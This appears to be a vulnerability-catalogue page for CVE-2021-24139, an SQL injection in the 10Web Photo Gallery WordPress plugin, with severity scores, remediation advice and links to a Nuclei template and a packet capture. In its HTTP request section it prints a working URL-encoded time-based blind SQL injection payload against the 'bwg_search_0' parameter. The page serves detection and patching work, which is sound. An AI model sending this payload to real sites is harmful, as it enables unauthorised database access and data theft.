🔙 목록으로 돌아가기

CVE-2021-24139: 10Web Photo Gallery < 1.5.55 - SQL Injection

Title10Web Photo Gallery < 1.5.55 - SQL Injection
Authorriteshs4hu
SeverityCritical
ImpactAttackers can execute arbitrary SQL commands, potentially leading to data theft, data tampering, or full database compromise.
RemediationUpdate to version 1.5.55 or later.
CVSS Score9.8
EPSS Score0.48694
CVE IDCVE-2021-24139
CWE IDCWE-89
Tags cve cve2021 wp wp-plugin sqli photo-gallery 10web vkev

🔍 Vulnerability Description

WordPress plugin 10Web Photo Gallery versions before 1.5.55 contains a SQL injection caused by unvalidated input in the ‘bwg_search_x’ parameter in frontend/models/model.php, letting attackers execute arbitrary SQL commands, exploit requires attacker to control the ‘bwg_search_x’ parameter.

🌐 HTTP Request

GET /index.php?rest_route=/wp/v2/pages HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Connection: close
Accept-Encoding: gzip
GET /ktyZNj/?bwg_search_0=%22%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F4846%2F%2A%2A%2FFROM%2F%2A%2A%2F%28SELECT%28SLEEP%285%29%29%29UIHp%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28%22zQgg%22%2F%2A%2A%2FLIKE%2F%2A%2A%2F%22zQgg HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-24139.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-24139.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A